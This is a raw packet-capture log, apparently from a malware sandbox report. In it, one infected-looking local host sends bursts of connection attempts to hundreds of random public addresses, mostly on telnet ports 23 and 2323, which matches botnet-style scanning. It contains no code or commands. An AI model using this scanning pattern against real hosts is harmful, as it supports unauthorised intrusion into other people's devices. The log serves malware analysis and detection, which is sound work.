                                                                        Dec 6, 2024 00:37:09.997642994 CET4197323192.168.2.23100.10.86.230
                                                                        Dec 6, 2024 00:37:09.997658968 CET232341973128.24.113.39192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997661114 CET4197323192.168.2.2377.223.249.102
                                                                        Dec 6, 2024 00:37:09.997663975 CET4197323192.168.2.23197.252.167.232
                                                                        Dec 6, 2024 00:37:09.997674942 CET2341973186.41.56.218192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997675896 CET4197323192.168.2.234.145.41.197
                                                                        Dec 6, 2024 00:37:09.997694969 CET419732323192.168.2.23128.24.113.39
                                                                        Dec 6, 2024 00:37:09.997701883 CET2341973159.13.3.176192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997709036 CET4197323192.168.2.23186.41.56.218
                                                                        Dec 6, 2024 00:37:09.997714043 CET234197340.63.73.223192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997733116 CET23419732.66.220.127192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997740030 CET4197323192.168.2.23159.13.3.176
                                                                        Dec 6, 2024 00:37:09.997740030 CET4197323192.168.2.2340.63.73.223
                                                                        Dec 6, 2024 00:37:09.997747898 CET2341973119.153.58.32192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997770071 CET4197323192.168.2.232.66.220.127
                                                                        Dec 6, 2024 00:37:09.997771025 CET234197332.198.34.224192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997777939 CET4197323192.168.2.23119.153.58.32
                                                                        Dec 6, 2024 00:37:09.997786045 CET2341973151.119.145.221192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997795105 CET234197365.111.89.243192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997803926 CET232341973122.102.122.137192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997805119 CET4197323192.168.2.2332.198.34.224
                                                                        Dec 6, 2024 00:37:09.997817993 CET4197323192.168.2.23151.119.145.221
                                                                        Dec 6, 2024 00:37:09.997818947 CET2341973103.104.237.81192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997832060 CET4197323192.168.2.2365.111.89.243
                                                                        Dec 6, 2024 00:37:09.997834921 CET2341973131.253.210.216192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997838974 CET419732323192.168.2.23122.102.122.137
                                                                        Dec 6, 2024 00:37:09.997848034 CET2341973150.13.201.255192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997852087 CET4197323192.168.2.23103.104.237.81
                                                                        Dec 6, 2024 00:37:09.997857094 CET2341973194.201.49.98192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997865915 CET234197347.152.234.163192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997875929 CET4197323192.168.2.23131.253.210.216
                                                                        Dec 6, 2024 00:37:09.997875929 CET4197323192.168.2.23150.13.201.255
                                                                        Dec 6, 2024 00:37:09.997884035 CET4197323192.168.2.23194.201.49.98
                                                                        Dec 6, 2024 00:37:09.997893095 CET4197323192.168.2.2347.152.234.163
                                                                        Dec 6, 2024 00:37:09.998038054 CET234197337.91.84.128192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998048067 CET234197344.60.180.167192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998076916 CET2341973126.74.10.214192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998079062 CET4197323192.168.2.2337.91.84.128
                                                                        Dec 6, 2024 00:37:09.998079062 CET4197323192.168.2.2344.60.180.167
                                                                        Dec 6, 2024 00:37:09.998095036 CET2341973159.75.201.199192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998105049 CET232341973136.9.61.154192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998111963 CET4197323192.168.2.23126.74.10.214
                                                                        Dec 6, 2024 00:37:09.998115063 CET2341973169.219.122.4192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998128891 CET2341973167.37.204.111192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998130083 CET4197323192.168.2.23159.75.201.199
                                                                        Dec 6, 2024 00:37:09.998130083 CET419732323192.168.2.23136.9.61.154
                                                                        Dec 6, 2024 00:37:09.998145103 CET234197367.161.32.35192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998150110 CET4197323192.168.2.23169.219.122.4
                                                                        Dec 6, 2024 00:37:09.998161077 CET2341973107.142.147.72192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998167038 CET4197323192.168.2.23167.37.204.111
                                                                        Dec 6, 2024 00:37:09.998171091 CET2341973123.10.205.51192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998179913 CET2341973199.77.241.91192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998179913 CET4197323192.168.2.2367.161.32.35
                                                                        Dec 6, 2024 00:37:09.998188972 CET4197323192.168.2.23107.142.147.72
                                                                        Dec 6, 2024 00:37:09.998194933 CET2341973157.7.86.117192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998203993 CET4197323192.168.2.23123.10.205.51
                                                                        Dec 6, 2024 00:37:09.998203993 CET2341973156.25.220.4192.168.2.23
                                                                        Dec 6, 2024 00:37:09.998217106 CET4197323192.168.2.23199.77.241.91
                                                                        Dec 6, 2024 00:37:09.998226881 CET4197323192.168.2.23157.7.86.117
                                                                        Dec 6, 2024 00:37:09.998238087 CET4197323192.168.2.23156.25.220.4
                                                                        Dec 6, 2024 00:37:09.999428034 CET2341973195.90.79.238192.168.2.23
                                                                        Dec 6, 2024 00:37:09.999463081 CET4197323192.168.2.23195.90.79.238
                                                                        Dec 6, 2024 00:37:10.014071941 CET4338252869192.168.2.23135.110.147.149
                                                                        Dec 6, 2024 00:37:10.035605907 CET5410280192.168.2.2342.222.208.96
                                                                        Dec 6, 2024 00:37:10.065431118 CET814036637.118.61.47192.168.2.23
                                                                        Dec 6, 2024 00:37:10.089387894 CET8048762138.35.154.46192.168.2.23
                                                                        Dec 6, 2024 00:37:10.108654022 CET555557340163.191.18.235192.168.2.23
                                                                        Dec 6, 2024 00:37:10.110220909 CET573405555192.168.2.23163.191.18.235
                                                                        Dec 6, 2024 00:37:10.133663893 CET5286943382135.110.147.149192.168.2.23
                                                                        Dec 6, 2024 00:37:10.133713007 CET4338252869192.168.2.23135.110.147.149
                                                                        Dec 6, 2024 00:37:10.154577971 CET805410242.222.208.96192.168.2.23
                                                                        Dec 6, 2024 00:37:10.154628992 CET5410280192.168.2.2342.222.208.96
                                                                        Dec 6, 2024 00:37:10.333075047 CET4338252869192.168.2.23135.110.147.149
                                                                        Dec 6, 2024 00:37:10.354108095 CET5410280192.168.2.2342.222.208.96
                                                                        Dec 6, 2024 00:37:10.449345112 CET5286943382135.110.147.149192.168.2.23
                                                                        Dec 6, 2024 00:37:10.476402044 CET805410242.222.208.96192.168.2.23
                                                                        Dec 6, 2024 00:37:10.776928902 CET844356716102.26.234.249192.168.2.23
                                                                        Dec 6, 2024 00:37:10.782109976 CET567168443192.168.2.23102.26.234.249
                                                                        Dec 6, 2024 00:37:10.870754004 CET419731023192.168.2.23192.249.199.68
                                                                        Dec 6, 2024 00:37:10.870758057 CET4197323192.168.2.2344.242.105.25
                                                                        Dec 6, 2024 00:37:10.870780945 CET4197323192.168.2.23155.27.201.232
                                                                        Dec 6, 2024 00:37:10.870795012 CET4197323192.168.2.23102.228.246.211
                                                                        Dec 6, 2024 00:37:10.870800018 CET4197323192.168.2.2361.31.122.63
                                                                        Dec 6, 2024 00:37:10.870800018 CET4197323192.168.2.23207.9.59.248
                                                                        Dec 6, 2024 00:37:10.870817900 CET4197323192.168.2.2391.219.100.116
                                                                        Dec 6, 2024 00:37:10.870821953 CET4197323192.168.2.23158.162.246.251
                                                                        Dec 6, 2024 00:37:10.870826960 CET4197323192.168.2.2332.201.106.254
                                                                        Dec 6, 2024 00:37:10.870850086 CET4197323192.168.2.23141.191.144.22
                                                                        Dec 6, 2024 00:37:10.870851994 CET419732323192.168.2.2332.108.121.73
                                                                        Dec 6, 2024 00:37:10.870860100 CET4197323192.168.2.23204.103.196.6
                                                                        Dec 6, 2024 00:37:10.870871067 CET4197323192.168.2.2373.94.156.224
                                                                        Dec 6, 2024 00:37:10.870877028 CET4197323192.168.2.23149.166.66.142
                                                                        Dec 6, 2024 00:37:10.870893002 CET4197323192.168.2.2372.84.9.5
                                                                        Dec 6, 2024 00:37:10.870898008 CET4197323192.168.2.2363.130.27.100
                                                                        Dec 6, 2024 00:37:10.870909929 CET4197323192.168.2.23223.113.92.148
                                                                        Dec 6, 2024 00:37:10.870910883 CET4197323192.168.2.23213.173.32.113
                                                                        Dec 6, 2024 00:37:10.870923996 CET4197323192.168.2.23163.151.143.27
                                                                        Dec 6, 2024 00:37:10.870933056 CET4197323192.168.2.23194.210.70.10
                                                                        Dec 6, 2024 00:37:10.870950937 CET419732323192.168.2.23119.110.178.22
                                                                        Dec 6, 2024 00:37:10.870950937 CET4197323192.168.2.2395.233.121.247
                                                                        Dec 6, 2024 00:37:10.870964050 CET4197323192.168.2.23161.248.70.216
                                                                        Dec 6, 2024 00:37:10.870965004 CET4197323192.168.2.23212.216.173.132
                                                                        Dec 6, 2024 00:37:10.870965958 CET4197323192.168.2.23174.16.131.28
                                                                        Dec 6, 2024 00:37:10.870980024 CET4197323192.168.2.2312.106.234.254
                                                                        Dec 6, 2024 00:37:10.870980024 CET4197323192.168.2.2360.115.99.114
                                                                        Dec 6, 2024 00:37:10.870995045 CET4197323192.168.2.23219.194.181.234
                                                                        Dec 6, 2024 00:37:10.870997906 CET4197323192.168.2.23136.3.255.155
                                                                        Dec 6, 2024 00:37:10.871010065 CET4197323192.168.2.2370.87.127.215
                                                                        Dec 6, 2024 00:37:10.871016026 CET419732323192.168.2.23205.208.222.2
                                                                        Dec 6, 2024 00:37:10.871026039 CET4197323192.168.2.23193.91.29.123
                                                                        Dec 6, 2024 00:37:10.871040106 CET4197323192.168.2.23200.2.156.29
                                                                        Dec 6, 2024 00:37:10.871042013 CET4197323192.168.2.2385.226.91.117
                                                                        Dec 6, 2024 00:37:10.871056080 CET4197323192.168.2.23183.204.142.230
                                                                        Dec 6, 2024 00:37:10.871069908 CET4197323192.168.2.23190.174.210.160
                                                                        Dec 6, 2024 00:37:10.871069908 CET4197323192.168.2.2374.255.185.227
                                                                        Dec 6, 2024 00:37:10.871079922 CET4197323192.168.2.23168.194.185.107
                                                                        Dec 6, 2024 00:37:10.871085882 CET4197323192.168.2.23147.64.52.138
                                                                        Dec 6, 2024 00:37:10.871092081 CET4197323192.168.2.23118.78.71.168
                                                                        Dec 6, 2024 00:37:10.871100903 CET419732323192.168.2.2363.242.194.135
                                                                        Dec 6, 2024 00:37:10.871110916 CET4197323192.168.2.23122.56.65.132
                                                                        Dec 6, 2024 00:37:10.871113062 CET4197323192.168.2.2376.191.91.107
                                                                        Dec 6, 2024 00:37:10.871134996 CET4197323192.168.2.23174.95.117.39
                                                                        Dec 6, 2024 00:37:10.871135950 CET4197323192.168.2.23206.176.89.245
                                                                        Dec 6, 2024 00:37:10.871145010 CET4197323192.168.2.2323.240.7.42
                                                                        Dec 6, 2024 00:37:10.871167898 CET4197323192.168.2.23116.134.81.201
                                                                        Dec 6, 2024 00:37:10.871181011 CET4197323192.168.2.23204.231.168.74
                                                                        Dec 6, 2024 00:37:10.871182919 CET4197323192.168.2.2353.39.31.201
                                                                        Dec 6, 2024 00:37:10.871198893 CET419732323192.168.2.2340.58.146.177
                                                                        Dec 6, 2024 00:37:10.871210098 CET4197323192.168.2.2385.176.71.25
                                                                        Dec 6, 2024 00:37:10.871217012 CET4197323192.168.2.2314.34.95.25
                                                                        Dec 6, 2024 00:37:10.871225119 CET4197323192.168.2.2379.229.254.12
                                                                        Dec 6, 2024 00:37:10.871225119 CET4197323192.168.2.2327.237.102.173
                                                                        Dec 6, 2024 00:37:10.871242046 CET4197323192.168.2.2398.228.86.135
                                                                        Dec 6, 2024 00:37:10.871254921 CET4197323192.168.2.23109.221.133.81
                                                                        Dec 6, 2024 00:37:10.871254921 CET4197323192.168.2.2339.236.234.255
                                                                        Dec 6, 2024 00:37:10.871263027 CET4197323192.168.2.2368.34.138.250
                                                                        Dec 6, 2024 00:37:10.871268988 CET4197323192.168.2.2374.62.183.28
                                                                        Dec 6, 2024 00:37:10.871279001 CET419732323192.168.2.2370.243.54.250
                                                                        Dec 6, 2024 00:37:10.871279001 CET4197323192.168.2.23210.110.167.226
                                                                        Dec 6, 2024 00:37:10.871298075 CET4197323192.168.2.23107.131.161.204
                                                                        Dec 6, 2024 00:37:10.871304989 CET4197323192.168.2.23146.248.220.74
                                                                        Dec 6, 2024 00:37:10.871320009 CET4197323192.168.2.23105.42.96.147
                                                                        Dec 6, 2024 00:37:10.871324062 CET4197323192.168.2.23102.123.138.102
                                                                        Dec 6, 2024 00:37:10.871339083 CET4197323192.168.2.23116.188.189.117
                                                                        Dec 6, 2024 00:37:10.871341944 CET4197323192.168.2.2327.194.66.115
                                                                        Dec 6, 2024 00:37:10.871351004 CET4197323192.168.2.2360.253.197.155
                                                                        Dec 6, 2024 00:37:10.871361971 CET4197323192.168.2.23216.185.174.31
                                                                        Dec 6, 2024 00:37:10.871367931 CET419732323192.168.2.23217.169.205.139
                                                                        Dec 6, 2024 00:37:10.871383905 CET4197323192.168.2.2389.134.158.67
                                                                        Dec 6, 2024 00:37:10.871392012 CET4197323192.168.2.2336.84.154.25
                                                                        Dec 6, 2024 00:37:10.871403933 CET4197323192.168.2.2398.117.183.208
                                                                        Dec 6, 2024 00:37:10.871412039 CET4197323192.168.2.2313.11.122.184
                                                                        Dec 6, 2024 00:37:10.871419907 CET4197323192.168.2.2353.193.186.42
                                                                        Dec 6, 2024 00:37:10.871434927 CET4197323192.168.2.2398.117.10.99
                                                                        Dec 6, 2024 00:37:10.871438026 CET4197323192.168.2.2381.15.36.179
                                                                        Dec 6, 2024 00:37:10.871449947 CET4197323192.168.2.23123.52.84.137
                                                                        Dec 6, 2024 00:37:10.871460915 CET4197323192.168.2.23162.191.4.11
                                                                        Dec 6, 2024 00:37:10.871469021 CET419732323192.168.2.23123.142.178.181
                                                                        Dec 6, 2024 00:37:10.871479034 CET4197323192.168.2.23112.189.212.72
                                                                        Dec 6, 2024 00:37:10.871489048 CET4197323192.168.2.23167.229.154.152
                                                                        Dec 6, 2024 00:37:10.871490002 CET4197323192.168.2.23112.217.15.12
                                                                        Dec 6, 2024 00:37:10.871504068 CET4197323192.168.2.23165.164.202.41
                                                                        Dec 6, 2024 00:37:10.871505976 CET4197323192.168.2.231.8.68.164
                                                                        Dec 6, 2024 00:37:10.871516943 CET4197323192.168.2.2312.4.79.251
                                                                        Dec 6, 2024 00:37:10.871520042 CET4197323192.168.2.23221.166.77.122
                                                                        Dec 6, 2024 00:37:10.871535063 CET4197323192.168.2.2367.116.119.254
                                                                        Dec 6, 2024 00:37:10.871539116 CET4197323192.168.2.23115.208.218.29
                                                                        Dec 6, 2024 00:37:10.871545076 CET419732323192.168.2.23118.127.59.109
                                                                        Dec 6, 2024 00:37:10.871557951 CET4197323192.168.2.23149.175.64.109
                                                                        Dec 6, 2024 00:37:10.871563911 CET4197323192.168.2.23198.170.166.128
                                                                        Dec 6, 2024 00:37:10.871572018 CET4197323192.168.2.2387.75.198.134
                                                                        Dec 6, 2024 00:37:10.871582985 CET4197323192.168.2.23202.45.84.44
                                                                        Dec 6, 2024 00:37:10.871591091 CET4197323192.168.2.2363.52.248.228
                                                                        Dec 6, 2024 00:37:10.871597052 CET4197323192.168.2.23188.49.232.122
                                                                        Dec 6, 2024 00:37:10.871612072 CET4197323192.168.2.23198.187.26.141
                                                                        Dec 6, 2024 00:37:10.871619940 CET4197323192.168.2.23161.126.80.186
                                                                        Dec 6, 2024 00:37:10.871640921 CET419732323192.168.2.23111.200.88.181
                                                                        Dec 6, 2024 00:37:10.871640921 CET4197323192.168.2.232.110.234.123
                                                                        Dec 6, 2024 00:37:10.871644020 CET4197323192.168.2.2370.76.39.15
                                                                        Dec 6, 2024 00:37:10.871654034 CET4197323192.168.2.23101.90.127.111
                                                                        Dec 6, 2024 00:37:10.871658087 CET4197323192.168.2.2361.154.220.89
                                                                        Dec 6, 2024 00:37:10.871668100 CET4197323192.168.2.23111.153.111.213
                                                                        Dec 6, 2024 00:37:10.871675014 CET4197323192.168.2.2380.49.179.130
                                                                        Dec 6, 2024 00:37:10.871687889 CET4197323192.168.2.23174.118.148.13
                                                                        Dec 6, 2024 00:37:10.871692896 CET4197323192.168.2.23122.201.84.137
                                                                        Dec 6, 2024 00:37:10.871702909 CET4197323192.168.2.23121.145.0.218
                                                                        Dec 6, 2024 00:37:10.871702909 CET4197323192.168.2.23187.183.82.31
                                                                        Dec 6, 2024 00:37:10.871718884 CET419732323192.168.2.2339.162.168.75
                                                                        Dec 6, 2024 00:37:10.871726990 CET4197323192.168.2.2346.44.193.132
                                                                        Dec 6, 2024 00:37:10.871742964 CET4197323192.168.2.2359.207.152.109
                                                                        Dec 6, 2024 00:37:10.871742964 CET4197323192.168.2.2367.176.227.164
                                                                        Dec 6, 2024 00:37:10.871754885 CET4197323192.168.2.23117.187.57.252
                                                                        Dec 6, 2024 00:37:10.871762991 CET4197323192.168.2.23171.215.234.12
                                                                        Dec 6, 2024 00:37:10.871774912 CET4197323192.168.2.2353.142.186.240
                                                                        Dec 6, 2024 00:37:10.871783018 CET4197323192.168.2.23101.31.231.143
                                                                        Dec 6, 2024 00:37:10.871790886 CET4197323192.168.2.2339.37.253.21
                                                                        Dec 6, 2024 00:37:10.871790886 CET4197323192.168.2.23196.38.208.33
                                                                        Dec 6, 2024 00:37:10.871804953 CET419732323192.168.2.23173.245.36.78
                                                                        Dec 6, 2024 00:37:10.871817112 CET4197323192.168.2.2324.91.153.160
                                                                        Dec 6, 2024 00:37:10.871824026 CET4197323192.168.2.2357.36.12.231
                                                                        Dec 6, 2024 00:37:10.871839046 CET419731023192.168.2.23199.41.81.228
                                                                        Dec 6, 2024 00:37:10.871840000 CET4197323192.168.2.23166.247.125.208
                                                                        Dec 6, 2024 00:37:10.871849060 CET4197323192.168.2.2392.175.26.211
                                                                        Dec 6, 2024 00:37:10.871850967 CET4197323192.168.2.23109.66.169.147
                                                                        Dec 6, 2024 00:37:10.871871948 CET4197323192.168.2.23120.101.250.215
                                                                        Dec 6, 2024 00:37:10.871872902 CET4197323192.168.2.2381.18.43.59
                                                                        Dec 6, 2024 00:37:10.871882915 CET4197323192.168.2.23111.168.49.8
                                                                        Dec 6, 2024 00:37:10.871889114 CET419732323192.168.2.2331.95.214.167
                                                                        Dec 6, 2024 00:37:10.871895075 CET4197323192.168.2.23201.189.177.159
                                                                        Dec 6, 2024 00:37:10.871910095 CET4197323192.168.2.23141.13.78.222
                                                                        Dec 6, 2024 00:37:10.871920109 CET4197323192.168.2.2399.116.93.123
                                                                        Dec 6, 2024 00:37:10.871920109 CET4197323192.168.2.23209.242.89.140
                                                                        Dec 6, 2024 00:37:10.871934891 CET4197323192.168.2.23107.48.56.193
                                                                        Dec 6, 2024 00:37:10.871936083 CET4197323192.168.2.23201.58.110.58
                                                                        Dec 6, 2024 00:37:10.871947050 CET4197323192.168.2.23223.182.27.50
                                                                        Dec 6, 2024 00:37:10.871958017 CET4197323192.168.2.2381.210.227.191
                                                                        Dec 6, 2024 00:37:10.871963024 CET4197323192.168.2.23192.243.35.123
                                                                        Dec 6, 2024 00:37:10.871969938 CET419732323192.168.2.23166.121.149.119
                                                                        Dec 6, 2024 00:37:10.871988058 CET4197323192.168.2.23117.147.3.47
                                                                        Dec 6, 2024 00:37:10.871994019 CET4197323192.168.2.23123.162.223.157
                                                                        Dec 6, 2024 00:37:10.872000933 CET4197323192.168.2.23120.221.242.60
                                                                        Dec 6, 2024 00:37:10.872009993 CET4197323192.168.2.23106.125.195.90
                                                                        Dec 6, 2024 00:37:10.872019053 CET4197323192.168.2.2357.80.114.32
                                                                        Dec 6, 2024 00:37:10.872025967 CET4197323192.168.2.23154.142.225.190
                                                                        Dec 6, 2024 00:37:10.872036934 CET4197323192.168.2.2387.121.201.140
                                                                        Dec 6, 2024 00:37:10.872045040 CET4197323192.168.2.2357.120.124.133
                                                                        Dec 6, 2024 00:37:10.872051954 CET4197323192.168.2.23110.185.231.60
                                                                        Dec 6, 2024 00:37:10.872061968 CET419732323192.168.2.23183.95.37.176
                                                                        Dec 6, 2024 00:37:10.872066021 CET4197323192.168.2.2320.37.239.81
                                                                        Dec 6, 2024 00:37:10.872066975 CET4197323192.168.2.23118.231.48.239
                                                                        Dec 6, 2024 00:37:10.872077942 CET4197323192.168.2.234.168.14.129
                                                                        Dec 6, 2024 00:37:10.872090101 CET4197323192.168.2.2395.184.72.10
                                                                        Dec 6, 2024 00:37:10.872097969 CET4197323192.168.2.2324.144.31.101
                                                                        Dec 6, 2024 00:37:10.872109890 CET4197323192.168.2.23165.99.132.22
                                                                        Dec 6, 2024 00:37:10.872117043 CET4197323192.168.2.2345.254.220.145
                                                                        Dec 6, 2024 00:37:10.872128963 CET4197323192.168.2.2354.19.60.243
                                                                        Dec 6, 2024 00:37:10.872131109 CET4197323192.168.2.23204.160.61.160
                                                                        Dec 6, 2024 00:37:10.992805958 CET234197344.242.105.25192.168.2.23
                                                                        Dec 6, 2024 00:37:10.992832899 CET102341973192.249.199.68192.168.2.23
                                                                        Dec 6, 2024 00:37:10.992865086 CET4197323192.168.2.2344.242.105.25
                                                                        Dec 6, 2024 00:37:10.992875099 CET419731023192.168.2.23192.249.199.68
                                                                        Dec 6, 2024 00:37:10.994302034 CET2341973155.27.201.232192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994318008 CET234197361.31.122.63192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994327068 CET2341973102.228.246.211192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994338036 CET2341973207.9.59.248192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994366884 CET4197323192.168.2.23155.27.201.232
                                                                        Dec 6, 2024 00:37:10.994370937 CET4197323192.168.2.2361.31.122.63
                                                                        Dec 6, 2024 00:37:10.994394064 CET4197323192.168.2.23207.9.59.248
                                                                        Dec 6, 2024 00:37:10.994409084 CET4197323192.168.2.23102.228.246.211
                                                                        Dec 6, 2024 00:37:10.994436979 CET234197391.219.100.116192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994447947 CET2341973158.162.246.251192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994468927 CET234197332.201.106.254192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994471073 CET4197323192.168.2.2391.219.100.116
                                                                        Dec 6, 2024 00:37:10.994479895 CET23234197332.108.121.73192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994489908 CET2341973141.191.144.22192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994494915 CET4197323192.168.2.23158.162.246.251
                                                                        Dec 6, 2024 00:37:10.994499922 CET2341973204.103.196.6192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994508982 CET4197323192.168.2.2332.201.106.254
                                                                        Dec 6, 2024 00:37:10.994510889 CET2341973149.166.66.142192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994520903 CET419732323192.168.2.2332.108.121.73
                                                                        Dec 6, 2024 00:37:10.994524956 CET234197373.94.156.224192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994529963 CET4197323192.168.2.23141.191.144.22
                                                                        Dec 6, 2024 00:37:10.994549036 CET4197323192.168.2.23149.166.66.142
                                                                        Dec 6, 2024 00:37:10.994553089 CET4197323192.168.2.23204.103.196.6
                                                                        Dec 6, 2024 00:37:10.994554043 CET234197363.130.27.100192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994560003 CET4197323192.168.2.2373.94.156.224
                                                                        Dec 6, 2024 00:37:10.994565010 CET234197372.84.9.5192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994585037 CET2341973223.113.92.148192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994594097 CET2341973213.173.32.113192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994601011 CET4197323192.168.2.2372.84.9.5
                                                                        Dec 6, 2024 00:37:10.994601965 CET4197323192.168.2.2363.130.27.100
                                                                        Dec 6, 2024 00:37:10.994605064 CET2341973163.151.143.27192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994626999 CET4197323192.168.2.23223.113.92.148
                                                                        Dec 6, 2024 00:37:10.994626999 CET4197323192.168.2.23213.173.32.113
                                                                        Dec 6, 2024 00:37:10.994632006 CET2341973194.210.70.10192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994640112 CET4197323192.168.2.23163.151.143.27
                                                                        Dec 6, 2024 00:37:10.994652033 CET2341973161.248.70.216192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994668961 CET2341973174.16.131.28192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994678974 CET4197323192.168.2.23194.210.70.10
                                                                        Dec 6, 2024 00:37:10.994678974 CET4197323192.168.2.23161.248.70.216
                                                                        Dec 6, 2024 00:37:10.994679928 CET2341973212.216.173.132192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994690895 CET232341973119.110.178.22192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994702101 CET234197395.233.121.247192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994709969 CET4197323192.168.2.23174.16.131.28
                                                                        Dec 6, 2024 00:37:10.994709969 CET4197323192.168.2.23212.216.173.132
                                                                        Dec 6, 2024 00:37:10.994712114 CET234197312.106.234.254192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994726896 CET419732323192.168.2.23119.110.178.22
                                                                        Dec 6, 2024 00:37:10.994726896 CET4197323192.168.2.2395.233.121.247
                                                                        Dec 6, 2024 00:37:10.994740963 CET4197323192.168.2.2312.106.234.254
                                                                        Dec 6, 2024 00:37:10.994760990 CET234197360.115.99.114192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994771957 CET2341973219.194.181.234192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994781971 CET2341973136.3.255.155192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994802952 CET234197370.87.127.215192.168.2.23
                                                                        Dec 6, 2024 00:37:10.994810104 CET4197323192.168.2.23219.194.181.234
                                                                        Dec 6, 2024 00:37:10.994810104 CET4197323192.168.2.2360.115.99.114
                                                                        Dec 6, 2024 00:37:10.994826078 CET4197323192.168.2.23136.3.255.155
                                                                        Dec 6, 2024 00:37:10.994837999 CET4197323192.168.2.2370.87.127.215
                                                                        Dec 6, 2024 00:37:10.995361090 CET232341973205.208.222.2192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995371103 CET2341973193.91.29.123192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995379925 CET2341973200.2.156.29192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995404959 CET234197385.226.91.117192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995404959 CET4197323192.168.2.23193.91.29.123
                                                                        Dec 6, 2024 00:37:10.995405912 CET419732323192.168.2.23205.208.222.2
                                                                        Dec 6, 2024 00:37:10.995415926 CET2341973183.204.142.230192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995424986 CET2341973190.174.210.160192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995426893 CET4197323192.168.2.23200.2.156.29
                                                                        Dec 6, 2024 00:37:10.995429993 CET4197323192.168.2.2385.226.91.117
                                                                        Dec 6, 2024 00:37:10.995438099 CET234197374.255.185.227192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995450974 CET4197323192.168.2.23183.204.142.230
                                                                        Dec 6, 2024 00:37:10.995450974 CET4197323192.168.2.23190.174.210.160
                                                                        Dec 6, 2024 00:37:10.995457888 CET2341973168.194.185.107192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995465994 CET4197323192.168.2.2374.255.185.227
                                                                        Dec 6, 2024 00:37:10.995470047 CET2341973147.64.52.138192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995480061 CET2341973118.78.71.168192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995497942 CET4197323192.168.2.23168.194.185.107
                                                                        Dec 6, 2024 00:37:10.995501995 CET23234197363.242.194.135192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995503902 CET4197323192.168.2.23147.64.52.138
                                                                        Dec 6, 2024 00:37:10.995512962 CET2341973122.56.65.132192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995528936 CET234197376.191.91.107192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995529890 CET4197323192.168.2.23118.78.71.168
                                                                        Dec 6, 2024 00:37:10.995529890 CET419732323192.168.2.2363.242.194.135
                                                                        Dec 6, 2024 00:37:10.995538950 CET2341973174.95.117.39192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995543003 CET4197323192.168.2.23122.56.65.132
                                                                        Dec 6, 2024 00:37:10.995554924 CET2341973206.176.89.245192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995560884 CET4197323192.168.2.2376.191.91.107
                                                                        Dec 6, 2024 00:37:10.995564938 CET234197323.240.7.42192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995575905 CET2341973116.134.81.201192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995590925 CET2341973204.231.168.74192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995590925 CET4197323192.168.2.23174.95.117.39
                                                                        Dec 6, 2024 00:37:10.995599031 CET4197323192.168.2.23206.176.89.245
                                                                        Dec 6, 2024 00:37:10.995606899 CET234197353.39.31.201192.168.2.23
                                                                        Dec 6, 2024 00:37:10.995611906 CET4197323192.168.2.2323.240.7.42
                                                                        Dec 6, 2024 00:37:10.995619059 CET4197323192.168.2.23204.231.168.74
